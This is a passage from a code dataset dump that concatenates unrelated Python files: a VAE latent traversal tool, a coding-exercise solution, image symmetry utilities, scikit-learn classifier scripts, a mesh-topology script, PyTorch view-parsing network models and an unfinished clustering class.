print('Done.')\r\n","sub_path":"MonteCarlo_train.py","file_name":"MonteCarlo_train.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201643906","text":"import numpy as np\nimport tensorflow as tf\nfrom disentangle.general import Timer, loading_bar\nimport cv2\nimport os\nimport imageio\nimport shutil\nclass Traversal:\n\t\n\tdef __init__(self, model, inputs):\n\t\t\"\"\"Traversal of the latent space class give one model and one set of inputs\n\t\t\n\t\tExamples:\n\t\t\t>>> def image_traversal(model, inputs, latent_of_focus=3, min_value=0, max_value=3, num_steps=15, is_visualizable=True)\n\t\t\t>>> \ttraverse = Traversal(model, inputs)\n\t\t\t>>> \ttraverse.traverse_latent_space(latent_of_focus=3, min_value=0, max_value=3, num_steps=15)\n\t\t\t>>> \ttraverse.create_samples()\n\t\t\t>>> \tif not is_visualizable:\n\t\t\t>>> \t\treturn traverse.samples\n\t\t\t>>> \treturn traverse.construct_single_image()\n\n\n\t\tArgs:\n\t\t model (Tensorflow Keras Model): Tensorflow VAE from utils.tf_custom\n\t\t inputs (numpy arr): Input images in NHWC\n\t\t latent_of_focus (int): Latent element to traverse, arbitraly set to 0 as default\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\tReturns:\n\t\t Numpy arr: image\n\t\t\"\"\"\n\t\tself.model = model\n\t\tself.orig_inputs = inputs\n\t\tself.inputs = inputs\n\t\tself.samples = None\n\t\tself.latent_rep_trav = None #latent traversal to become shape [num traversal, N, num latents]\n\n\t@property\n\tdef num_latents(self):\n\t\treturn self.model.num_latents\n\n\tdef traverse_complete_latent_space(self, min_value=-3, max_value=3, num_steps=30):\n\t\t\"\"\"Will travers all the latent space. \n\t\tThe num images and num latents dimensions will be flattened to one dimension\n\t\tshape of latents will be: [num images, num latents]\n\t\t\n\t\tArgs:\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\t\"\"\"\n\t\tlatent_reps = []\n\t\tinputs = None\n\t\t\n\t\t# accumulate images for all the different latent representations, for all images\n\t\tfor i in range(self.num_latents):\n\t\t\tself.traverse_latent_space(latent_of_focus=i, \n\t\t\t\tmin_value=min_value, max_value=max_value, num_steps=num_steps)\n\t\t\tlatent_reps.append(self.latent_rep_trav.copy())\n\t\t\t\n\t\t\tif inputs is None:\n\t\t\t\tinputs = np.empty((self.num_latents, *self.inputs.shape))\n\t\t\tinputs[i] = self.inputs\n\n\t\t# latents\n\t\tlatent_reps = np.asarray(latent_reps)\n\t\tlatent_reps = np.transpose(latent_reps, (2,0,1,3)) \n\t\tself.latent_rep_trav = latent_reps.reshape((-1, *latent_reps.shape[-2:])).transpose((1,0,2))\n\t\t# self.latent_rep_trav is flattened from [num_images, num_latents]\n\n\n\n\t\t# inputs duplication\n\t\tinputs = np.transpose(inputs, (1,0,2,3,4))\n\t\tinputs = np.reshape(inputs, (-1, *inputs.shape[-3:]))\n\t\tself.inputs = inputs\n\n\tdef encode(self, inputs):\n\t\treturn self.model.encoder(inputs)\n\n\tdef decode(self, samples):\n\t\treturn self.model.decoder(samples)\n\n\tdef traverse_latent_space(self, latent_of_focus=3, min_value=-3, max_value=3, num_steps=30, add_min_max=False):\n\t\t\"\"\"traverses the latent space, focuses on one latent for each given image.\n\t\t\n\t\tArgs:\n\t\t latent_of_focus (int): Latent element to traverse, arbitraly set to 0 as default\n\t\t min_value (int): min value for traversal\n\t\t max_value (int): max value for traversal\n\t\t num_steps (int): The number of steps between min and max value\n\t\t\n\t\t\"\"\"\n\t\tt = Timer()\n\t\t# initialize latent representation of images\n\t\t_, latent_rep, latent_logvar = self.encode(self.inputs)\n\t\tlatent_rep = latent_rep.numpy()\n\t\tstddev = np.sqrt(np.exp(latent_logvar.numpy()[:,latent_of_focus]))\n\n\t\t# create latent traversal\n\t\tlatent_rep_trav = []\n\t\tfor i in np.linspace(min_value, max_value, num_steps):\n\t\t\tmod_latent_rep = latent_rep.copy()\n\t\t\taddition = np.zeros(mod_latent_rep.shape)\n\t\t\taddition[:,latent_of_focus] = i\n\t\t\tmod_latent_rep=latent_rep\n\t\t\tif not add_min_max:\n\t\t\t\tmod_latent_rep[:,latent_of_focus]=0\n\t\t\tmod_latent_rep+=addition\n\t\t\tlatent_rep_trav.append(mod_latent_rep.copy())\n\n\n\t\tself.latent_rep_trav = np.asarray(latent_rep_trav)\n\t\tself.inputs = self.orig_inputs\n\n\n\tdef create_samples(self, batch_size=16):\n\t\t\"\"\"Creates the sample from the latent representation traversal\n\t\t\"\"\"\n\t\tassert not self.latent_rep_trav is None, \"Please call traverse_latent_space first to get latent elements for self.latent_rep_trav\"\n\n\t\t# flattened latent traversal for one batch dimension (assuming that the latent traversal is of the size, [num traversal, N, num latents])\n\t\tlatent_rep = np.vstack(self.latent_rep_trav)\n\n\t\t# get the samples\n\t\tgenerated = None\n\t\tfor i in range(np.ceil(latent_rep.shape[0]/batch_size).astype(int)):\n\t\t\tgen = self.decode(latent_rep[i*batch_size:(i+1)*batch_size]).numpy()\n\t\t\tif generated is None:\n\t\t\t\tgenerated = np.empty((latent_rep.shape[0],*gen.shape[1:]))\n\t\t\tgenerated[i*batch_size:(i+1)*batch_size] = gen\n\t\t# reshape back to [num traversal, N, W, H, C], as per self.latent_rep_trav\n\t\tself.samples = tf.reshape(generated, (*self.latent_rep_trav.shape[:2],*generated.shape[1:])).numpy()\n\t\n\tdef construct_single_image(self):\n\t\t\"\"\"Contruct a single image to be displayed from samples. samples should be of shape [num traversal, N, W, H, C]\n\t\t\n\t\tReturns:\n\t\t numpy array: array of images\n\t\t\"\"\"\n\t\tassert not self.latent_rep_trav is None, \"Please call create_samples first to get sample to reconstruct\"\n\n\t\tsamples = np.concatenate(self.samples,-2) # concatenate horizontally\n\t\tsamples = np.concatenate(samples,-3) # concatenate vertically\n\t\treal = np.concatenate(self.inputs,-3)\n\n\t\timage = np.concatenate((real, samples),-2) #concatenate the real and reconstructed images\n\t\timage = image[:,:,:3]\n\t\treturn image\n\t@property\n\tdef samples_list(self):\n\t\tinputs = np.broadcast_to(self.inputs, self.samples_list[0].shape)\n\t\treturn [inputs, self.samples]\n\n\tdef save_gif(self, gif_path, latent_num=None):\n\t\t\"\"\"Save traveral as a gif\n\t\t\n\t\tArgs:\n\t\t gif_path (nparray): the destination of the gif. Must end with .gif\n\t\t latent_num (int, optional): the latent number to animate. If this is None, will animate entire latent space \n\t\t\"\"\"\n\t\t# vertically stack all sample list\n\t\t# include inputs\n\t\t\n\t\tsamples = np.concatenate(self.samples_list, -3)\n\n\t\t# horizontally stack images\n\t\tsamples = samples.transpose(1,0,2,3,4)\n\t\tif latent_num is None:\n\t\t\tsamples = np.concatenate(samples, axis=-2)\t\n\t\telse:\n\t\t\tsamples = samples.reshape(-1, self.num_latents, *samples.shape[1:])\n\t\t\tsamples = np.concatenate(samples[:,latent_num], axis=-2)\n\n\t\tcreate_gif(samples, gif_path)\n\ndef create_gif(arr, gif_path):\n\t\"\"\"Creates samples from a NHWC data array and saves it into gif_path.\n\tarr must be a float between 0 and 1\n\t\n\tArgs:\n\t arr (nparray): gif array\n\t gif_path (str): path to save gif (must end with .gif)\n\t\"\"\"\n\ttmp_dir = os.path.splitext(gif_path)[0]+\"_tmp_gif\"\n\tif os.path.exists(tmp_dir):\n\t\t# remove previous exising temp\n\t\tshutil.rmtree(tmp_dir)\n\tos.mkdir(tmp_dir)\n\tframes_path = os.path.join(tmp_dir,\"{i}.jpg\")\n\tarr = np.concatenate((arr, np.flip(arr, axis=0)), 0)\n\n\n\tnum_images = len(arr)\n\tfor i, x in enumerate(arr):\n\t\trgb_img = (x[:,:,:3]*255).astype(np.uint8)\n\n\t\tcv2.imwrite(frames_path.format(i=i), cv2.cvtColor(rgb_img, cv2.COLOR_RGB2BGR), [int(cv2.IMWRITE_JPEG_QUALITY),100])\n\t\tprint(\"Creating Gif Frames: \", loading_bar(i+1, len(arr)), end=\"\\r\")\n\t\n\twith imageio.get_writer(gif_path, mode='I') as writer:\n\t\tfor i in range(num_images):\n\t\t\twriter.append_data(imageio.imread(frames_path.format(i=i)))\n\t\t\tprint(\"Stitching Gif Frames: \", loading_bar(i+1, len(arr)), end=\"\\r\")\n\tshutil.rmtree(tmp_dir)\n\tprint(\"\\nCreated gif: %s\"%gif_path)\n","sub_path":"src/disentangle/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"191835961","text":"#User function Template for python3\r\nfrom bisect import bisect_left\r\n \r\n# Function to find LIS in O(nlogn) time\r\ndef LongestIncreasingSubsequenceLength(v):\r\n if len(v) == 0:\r\n return 0\r\n \r\n tail = [0 for i in range(len(v) + 1)]\r\n length = 1\r\n \r\n tail[0] = v[0]\r\n \r\n for i in range(1, len(v)):\r\n if v[i] > tail[length-1]:\r\n tail[length] = v[i]\r\n length += 1\r\n \r\n else:\r\n tail[bisect_left(tail, v[i], 0, length-1)] = v[i]\r\n \r\n return length\r\n\r\nclass Solution:\r\n def minInsAndDel(self, arr, brr, N, M):\r\n # Find LCS using LIS\r\n vec = []\r\n s = set(brr)\r\n for i in arr:\r\n if i in s:\r\n vec.append(i)\r\n res = LongestIncreasingSubsequenceLength(vec)\r\n return abs(N - res) + abs(M - res) \r\n\r\n#{ \r\n# Driver Code Starts\r\n#Initial Template for Python 3\r\n\r\nif __name__ == '__main__': \r\n t = int (input ())\r\n for _ in range (t):\r\n N,M=map(int,input().split())\r\n A=list(map(int,input().split()))\r\n B=list(map(int,input().split()))\r\n \r\n ob = Solution()\r\n print(ob.minInsAndDel(A,B,N,M))\r\n# } Driver Code Ends","sub_path":"Day 30 - 39/33 - Day/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"326427503","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImage manipulation involving symmetry\n=====================================\n\"\"\"\nimport numpy as np\nfrom skimage.transform import rotate\n\nfrom npstreams import average, nan_to_num\n\nfrom ..array_utils import mirror\n\n\ndef nfold(im, mod, center=None, mask=None, fill_value=0.0):\n \"\"\" \n Returns an images averaged according to n-fold rotational symmetry. This can be used to\n boost the signal-to-noise ratio on an image with known symmetry, e.g. a diffraction pattern.\n\n Parameters\n ----------\n im : array_like, ndim 2\n Image to be azimuthally-symmetrized.\n center : array_like, shape (2,) or None, optional\n Coordinates of the center (in pixels). If ``center=None``, the image is rotated around\n its center, i.e. ``center=(rows / 2 - 0.5, cols / 2 - 0.5)``.\n mod : int\n Fold symmetry number. Valid numbers must be a divisor of 360.\n mask : `~numpy.ndarray` or None, optional\n Mask of `image`. The mask should evaluate to `True` (or 1) on valid pixels. \n If None (default), no mask is used.\n fill_value : float, optional\n In the case of a mask that overlaps with itself when rotationally averaged,\n the overlapping regions will be filled with this value.\n\n Returns\n -------\n out : `~numpy.ndarray`, dtype float\n Symmetrized image.\n\n Raises\n ------\n ValueError : If `mod` is not a divisor of 360 deg.\n \"\"\"\n if 360 % mod:\n raise ValueError(\n \"{}-fold rotational symmetry is not valid (not a divisor of 360).\".format(\n mod\n )\n )\n angles = range(0, 360, int(360 / mod))\n\n # Data-type must be float because of use of NaN\n im = np.array(im, dtype=np.float, copy=True)\n\n if mask is not None:\n im[np.logical_not(mask)] = np.nan\n\n kwargs = {\"center\": center, \"mode\": \"constant\", \"cval\": 0, \"preserve_range\": True}\n\n # Use weights because edges of the pictures, which might be cropped by the rotation\n # should not count in the average\n wt = np.ones_like(im, dtype=np.uint8)\n weights = (rotate(wt, angle, **kwargs) for angle in angles)\n rotated = (rotate(im, angle, **kwargs) for angle in angles)\n\n avg = average(rotated, weights=weights, ignore_nan=True)\n return nan_to_num(avg, fill_value, copy=False)\n\n\ndef reflection(im, angle, center=None, mask=None, fill_value=0.0):\n \"\"\"\n Symmetrize an image according to a reflection plane.\n\n Parameters\n ----------\n im : array_like, ndim 2\n Image to be symmetrized.\n angle : float\n Angle (in degrees) of the line that defines the reflection plane. This angle\n increases counter-clockwise from the positive x-axis. Angles\n larger that 360 are mapped back to [0, 360). Note that ``angle`` and ``angle + 180``\n are equivalent.\n center : array_like, shape (2,) or None, optional\n Coordinates of the center (in pixels). If ``center=None``, the image is rotated around\n its center, i.e. ``center=(rows / 2 - 0.5, cols / 2 - 0.5)``.\n mask : `~numpy.ndarray` or None, optional\n Mask of `image`. The mask should evaluate to `True` (or 1) on valid pixels. \n If None (default), no mask is used.\n fill_value : float, optional\n In the case of a mask that overlaps with itself when rotationally averaged,\n the overlapping regions will be filled with this value.\n\n Returns\n -------\n out : `~numpy.ndarray`, dtype float\n Symmetrized image.\n \"\"\"\n angle = float(angle) % 360\n\n # Data-type must be float because of use of NaN\n im = np.array(im, dtype=np.float, copy=True)\n reflected = np.array(im, copy=True) # reflected image\n\n if mask is not None:\n invalid_pixels = np.logical_not(mask)\n im[invalid_pixels] = np.nan\n reflected[invalid_pixels] = np.nan\n\n kwargs = {\"center\": center, \"mode\": \"constant\", \"cval\": 0, \"preserve_range\": True}\n\n # Rotate the 'reflected' image so that the reflection line is the x-axis\n # Flip the image along the y-axis\n # Rotate back to original orientation\n # FIXME: this will not work properly for images that are offcenter\n reflected = rotate(reflected, -angle, **kwargs)\n reflected = mirror(reflected, axes=0)\n reflected = rotate(reflected, angle, **kwargs)\n\n return nan_to_num(average([im, reflected]), fill_value, copy=False)\n","sub_path":"skued/image/symmetry.py","file_name":"symmetry.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"325504935","text":"from gensim.models.doc2vec import Doc2Vec, TaggedDocument\nfrom nltk.tokenize import word_tokenize\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\ndef svm(X_train, X_test, y_train, y_test):\n clf = SVC(C=32768, kernel='rbf', gamma=3.05e-5)\n clf.fit(X_train, y_train)\n\n print(\"SVM Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('svm2.sav', 'wb+'))\n print(\"Model Saved\")\n\ndef nb(X_train, X_test, y_train, y_test):\n clf = GaussianNB()\n clf.fit(X_train, y_train)\n\n print(\"Naive Bayes Model Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('nb2.sav', 'wb+'))\n print(\"Model Saved\")\n\n\ndef nn(X_train, X_test, y_train, y_test):\n clf = MLPClassifier(solver='adam', alpha=1,hidden_layer_sizes=(100, 25))\n clf.fit(X_train, y_train)\n\n print(\"Neural Net Trained\")\n\n pred = clf.predict(X_test)\n print(classification_report(y_test, pred))\n\n print(\"Test Accuracy\")\n print(accuracy_score(y_test, pred))\n\n pred = clf.predict(X_train)\n print(\"Train Accuracy\")\n print(accuracy_score(y_train, pred))\n\n pickle.dump(clf, open('nn2.sav', 'wb+'))\n print(\"Model Saved\")\n\n\nif __name__ == '__main__':\n\n\n d = {'happy':0, 'sad':1, 'angry':2, 'others':3}\n colors = ['blue','green','red','yellow']\n\n data = []\n labels= []\n\n with open('train.txt') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter='\\t')\n line_count = 0\n for row in csv_reader:\n if(line_count!=0):\n labels.append(d[row[4]])\n line_count+=1\n\n train_vector = np.load('data_vectors_2.npy')\n\n X_train, X_test, y_train, y_test = train_test_split(train_vector, labels, test_size=0.2)\n print(\"Data Split Done....\\n\")\n\n # np.save('X_train', X_train)\n # np.save('X_test', X_test)\n # np.save('y_train', y_train)\n # np.save('y_test', y_test)\n\n\n print(\"\\nSVM Model\")\n svm(X_train, X_test, y_train, y_test)\n\n print(\"\\nNaive Bayes Model\")\n nb(X_train, X_test, y_train, y_test)\n\n # print(\"\\nLogistic Regression Model\")\n # lr(X_train, X_test, y_train, y_test)\n\n print(\"\\nNeural Net\")\n nn(X_train, X_test, y_train, y_test)\n\n\n","sub_path":"classifiers_2.py","file_name":"classifiers_2.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"587838274","text":"# IMPORT OPERATIONS\nimport gp_utilities\nfrom gp_utilities import vector3d as vec\nimport os\nimport variables\n\ndef topo_modify(corners_along_sphere, sphere_surface_group, corners_around_sphere, translation_for_sphere,\n translation_around_sphere, density_between_spheres, density_after_spheres):\n #Topology_Modification\n topo.execute(\"transform_topo -g {} -sg {} -t1 {} {} {}\".format(corners_along_sphere, sphere_surface_group,\n translation_for_sphere.get_component(0),translation_for_sphere.get_component(1),\n translation_for_sphere.get_component(2)))\n topo.execute(\"transform_topo -g {} -t1 {} {} {}\".format(corners_around_sphere, translation_around_sphere.get_component(0),\n translation_around_sphere.get_component(1), translation_around_sphere.get_component(2)))\n\n #Density_Modification_between_spheres\n den = topo.den()\n den.set_density(topo.corner(variables.corners_between_spheres[0]), topo.corner(variables.corners_between_spheres[1]), density_between_spheres)\n den.set_density(topo.corner(variables.corners_between_spheres[1]), topo.corner(variables.corners_between_spheres[2]), density_between_spheres)\n\n #Density_Modification_after_spheres\n den.set_density(topo.corner(variables.corners_after_spheres[0]), topo.corner(variables.corners_after_spheres[1]), density_after_spheres)\n den.set_density(topo.corner(variables.corners_after_spheres[1]), topo.corner(variables.corners_after_spheres[2]), density_after_spheres)\n return topo\n\ndef write_schedule_file():\n #Write_schedule_file\n file = open(\"{}.sch\".format(output_file_prefix), \"w+\")\n file.writelines(\"step {}: -c all 1.0 0 -C all 1.0 24 -r -S {} -w \"\n \"\\nstep {}: -sys 'ws qchk {}.grd 11 10000 {} 120' \"\n \"\\nstep {}: -sys 'python Quality.py {}.sch'\"\n \"\\nwrite -f {}.grd\".format(variables.step_count, variables.sweep_count, variables.step_count+1,\n output_file_prefix, variables.skewness, variables.step_count+2,\n output_file_prefix, output_file_prefix))\n file.close()\n\n\n#Main Function\nif(__name__ == '__main__'):\n topo = gp_utilities.Topology()\n\n #Input_Parameters\n input_file_prefix = \"template\"\n initial_distance = float(10)\n den_between_spheres = 13\n den_after_spheres = 13\n corner_grp_along_sphere = 1\n corner_grp_around_sphere = 2\n sphere_surface_grp = 1\n\n #Topology Modification and Run Ggrid\n for i in range(10, 4, -1):\n topo.read(\"{}.fra\".format(input_file_prefix))\n translation_for_grp_along_sphere = vec(-(initial_distance-i), 0, 0)\n translation_for_grp_around_sphere = vec(-((initial_distance - i) / 2), 0, 0)\n den_between_spheres = den_between_spheres-1\n den_after_spheres = den_after_spheres+1\n topo_modify(corner_grp_along_sphere, sphere_surface_grp, corner_grp_around_sphere, translation_for_grp_along_sphere,\n translation_for_grp_around_sphere, den_between_spheres, den_after_spheres)\n output_file_prefix = \"distance_{}units\".format(i)\n topo.write_topology(\"{}.fra\".format(output_file_prefix))\n write_schedule_file()\n Ggrid = \"Ggrid {}.fra\".format(output_file_prefix)\n os.system(Ggrid)","sub_path":"Examples/API4_Tandem_Spheres/Tandem_Spheres.py","file_name":"Tandem_Spheres.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"428172017","text":"import os\nimport random\nimport numpy as np\nimport pandas as pd\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\n\nfrom data_helper import UnlabeledDataset, LabeledDataset\nfrom helper import collate_fn, draw_box\nfrom torchvision import transforms, models\n\nimport copy\nimport torchgeometry.core as tgm \nclass _DecoderBlock(nn.Module):\n \"\"\"\n Taken from https://github.com/zijundeng/pytorch-semantic-segmentation/blob/master/models/seg_net.py\n \"\"\"\n def __init__(self, in_channels, out_channels, num_conv_layers, out_activation = 'relu'):\n super(_DecoderBlock, self).__init__()\n middle_channels = int(in_channels / 2)\n layers = [\n nn.ConvTranspose2d(in_channels, in_channels, kernel_size=2, stride=2),\n nn.Conv2d(in_channels, middle_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(middle_channels),\n nn.ReLU(inplace=True)\n ]\n layers += [\n nn.Conv2d(middle_channels, middle_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(middle_channels),\n nn.ReLU(inplace=True),\n ] * (num_conv_layers - 2)\n layers += [\n nn.Conv2d(middle_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True) if out_activation == 'relu' else nn.Sigmoid(),\n ]\n self.decode = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.decode(x)\n \nclass _SameDecoder(nn.Module):\n def __init__(self, in_channels, out_channels, out_activation = 'relu'):\n super(_SameDecoder, self).__init__()\n layers = [\n nn.ConvTranspose2d(in_channels, in_channels, kernel_size=3, stride=3),\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True)\n ]\n\n layers += [\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True) if out_activation == 'relu' else nn.Sigmoid(),\n ]\n self.decode = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.decode(x)\n\n# pyramid style decoder:\nclass PPMBilinear(nn.Module):\n def __init__(self, num_class=1, fc_dim=256,\n pool_scales=(1, 2, 3, 6), out_size=800):\n super(PPMBilinear, self).__init__()\n self.out_size = out_size\n self.ppm = [nn.Sequential(nn.AdaptiveAvgPool2d(1), \n nn.Conv2d(fc_dim, 256, kernel_size=1, bias= False), \n nn.ReLU(inplace=True))]\n for scale in pool_scales[1:]:\n self.ppm.append(nn.Sequential(nn.AdaptiveAvgPool2d(scale), \n nn.Conv2d(fc_dim, 256, kernel_size=1, bias= False), \n nn.BatchNorm2d(256), \n nn.ReLU(inplace=True)))\n self.ppm = nn.ModuleList(self.ppm)\n\n self.pool_conv = nn.Sequential(\n nn.Conv2d(fc_dim+len(pool_scales)*256, 256,\n kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n nn.Dropout2d(0.1),\n # nn.Conv2d(512, num_class, kernel_size=1)\n )\n self.conv_last = nn.Sequential(*[_SameDecoder(256, 256), \n _DecoderBlock(256, 128, 2),\n _DecoderBlock(128, 64, 2), \n _DecoderBlock(64, 32, 2), \n _DecoderBlock(32, 1, 2, 'Sigmoid')])\n \n # self.sigmoid = nn.Sigmoid()\n def forward(self, conv_out):\n conv5 = conv_out[-1]\n\n input_size = conv5.size()\n \n ppm_out = [conv5]\n for pool_scale in self.ppm:\n ppm_out.append(nn.functional.interpolate(\n pool_scale(conv5),\n (input_size[2], input_size[3]),\n mode='bilinear', align_corners=False))\n ppm_out = torch.cat(ppm_out, 1)\n # print(ppm_out.shape)\n x = self.pool_conv(ppm_out)\n #feat = x\n x =self.conv_last(x)\n # print(x.shape)\n x = nn.functional.interpolate(x, (self.out_size,self.out_size), mode='bilinear', align_corners = False)\n \n return x\n\nclass TransformModule(nn.Module):\n '''\n Modified from https://github.com/pbw-Berwin/View-Parsing-Network/blob/dc0c4250302b84a8594f291a494b5e8969291e1b/segmentTool/models.py\n '''\n def __init__(self, dim1, dim2, num_view = 6):\n super(TransformModule, self).__init__()\n self.num_view = num_view\n self.dim1 = dim1\n self.dim2 = dim2\n self.mat_list = nn.ModuleList()\n \n for i in range(self.num_view):\n # weights are not shared\n fc_transform = nn.Sequential(\n nn.Linear(dim1* dim2, dim1*dim2*4), \n nn.ReLU(), \n nn.Linear(dim1 * dim2*4, dim1*dim2),\n nn.ReLU()\n )\n self.mat_list += [fc_transform]\n \n def forward(self, x):\n # shape B V C H W\n # flatten along the channel\n x = x.view(list(x.size()[:3]) + [self.dim1 * self.dim2,])\n # Transform the first image\n view_comb = self.mat_list[0](x[:, 0])\n for i in range(1, x.size(1)):\n # results are added(fusion func)\n view_comb += self.mat_list[i](x[:, i])\n view_comb = view_comb.view(list(view_comb.size()[:2]) + [self.dim1, self.dim2]) \n return view_comb\n \n\nclass vpn_model(nn.Module):\n def __init__(self, dim1, dim2, encoder, decoder):\n super(vpn_model, self).__init__()\n self.num_views = 6\n self.encoder = encoder\n \n self.transform = TransformModule(dim1=dim1, dim2=dim2)\n \n self.decoder = decoder\n \n \n def forward(self, x, return_feat = False):\n # flatten the output along channel: C x (HW)\n # weights are not shared, i.e. each first view input has\n # own VRM to get its top down view feature map \n # i here in range 6(MN, N=6,M=1(MODALITY))\n # j here in range num_channels\n # \n B,V,C,H,W = x.shape\n x = x.view(B*V, C, H, W)\n x = self.encoder(x)\n # return to B V \n x = x.view([B,V] + list(x.size()[1:]))\n x = self.transform(x) # B x c x h x w\n \n x = self.decoder([x])\n\n return x\n \nclass SpatialTransformer(nn.Module):\n\n def __init__(self, in_channels, kernel_size):\n '''\n Takes input in Bx 1024 x 16 x 20\n '''\n super(SpatialTransformer, self).__init__()\n self._in_ch = in_channels \n self._ksize = kernel_size\n\n self.prep_warper = nn.Sequential(*[\n nn.Conv2d(self._in_ch, 32, kernel_size=self._ksize, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 32, kernel_size=self._ksize, stride=1, padding=1, bias=False),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(2)\n \n ])\n \n self.warper_generator = nn.Sequential(*[\n nn.Linear(32*8*10, 1024), \n nn.ReLU(inplace = True),\n nn.Linear(1024, 9),\n nn.Tanh()\n ])\n\n def forward(self, x): \n \"\"\"\n Forward pass of the STN module. \n x -> input feature map \n x should be the feature map for a single view\n \"\"\"\n B, C, H, W = x.shape\n #localization net\n homo_mat = self.prep_warper(x)\n # concatenate 3 dim\n homo_mat = homo_mat.view(B, -1)\n \n homo_mat = self.warper_generator(homo_mat) # BV 3 X3 \n #reshape to homo matrix\n homo_mat = homo_mat.view(-1, 3, 3)\n # grid sample on original view\n warper = tgm.HomographyWarper(H, W)\n warpped = warper(x, homo_mat)\n return warpped\nclass ComplexTransformModule(nn.Module):\n def __init__(self, num_view=6):\n '''\n Takes in input B, V, C, H, W\n '''\n super(ComplexTransformModule, self).__init__()\n \n self.num_view = num_view\n\n self.mat_list = nn.ModuleList()\n \n for i in range(self.num_view):\n self.mat_list += [SpatialTransformer(1024, 3)]\n\n def forward(self, x):\n '''\n Takes in B,V,C,H, W, perform warpping on each image and concatenate by position\n '''\n B, V, C, H, W = x.size()\n view_comb = self.mat_list[0](x[:, 0])\n for i in range(1, V):\n view_comb += self.mat_list[i](x[:, i])\n # for each view, perform the warpped view\n #x[:, i] = self.mat_list[i](x[:, i])\n #Concatenate the view\n # x = position_concat_features(x)\n return view_comb\n\nclass vpn_model_v2(nn.Module):\n def __init__(self, encoder, decoder):\n super(vpn_model_v2, self).__init__()\n self.num_views = 6\n self.encoder = encoder\n \n self.transform = ComplexTransformModule()\n self.decoder = decoder\n \n \n def forward(self, x, return_feat = False):\n # flatten the output along channel: C x (HW)\n # weights are not shared, i.e. each first view input has\n # own VRM to get its top down view feature map \n # i here in range 6(MN, N=6,M=1(MODALITY))\n # j here in range num_channels\n # \n B,V,C,H,W = x.shape\n x = x.view(B*V, C, H, W)\n x = self.encoder(x)\n # return to B V \n x = x.view([B,V] + list(x.size()[1:]))\n \n x = self.transform(x) # B x c x h x w\n \n x = self.decoder([x])\n\n return x","sub_path":"Roadmap/VPN_model.py","file_name":"VPN_model.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"222547780","text":"from math import sqrt\nfrom itertools import combinations\nfrom itertools import product\nfrom collections import Iterable\nimport csv\n\ndef avg(lst):\n return sum(lst) / len(lst)\n\ndef colomn(matrix, i):\n return[row[i] for row in matrix]\n\nclass Clustering:\n linkages = {\"single\": min, \"complete\": max, \"average\": avg}\n\n def __init__(self, file_name, linkage=\"average\"):\n f = open(file_name, \"rt\", encoding=\"latin1\")\n self.t = [[i for i in l] for l in csv.reader(f)] #preberemo podatke v tabelo\n self.header = self.t[0] #si zapomnimo drzave v header\n del self.header[:16]\n self.country = []\n self.data = []\n self.dataArray = []\n self.clusters = []\n self.drzave = {}\n for i in range(1,len(self.t)):\n self.country.append(self.t[i][1])\n self.data.append([float(v) if v else None for v in self.t[i][16:]]) #naredimo tabelo podatkov v katero na prazna mesta vpisemo None\n self.linkage = self.linkages[linkage]\n for i in range(len(self.data[0])):\n self.dataArray.append(colomn(self.data, i)) #obrnemo tabelo podatkov\n self.clusters.append([i])\n self.drzave.update({i: self.header[i]}) #naredimo slovar drzav\n\n def column_distance(self, r1, r2):\n \"\"\"Evklidska razdalja med dvema stolpcema drzav\"\"\"\n euklid = [(x - y) ** 2\n for x, y in zip(r1, r2)\n if (x is not None) and (y is not None)]\n if (len(euklid) > 0):\n return 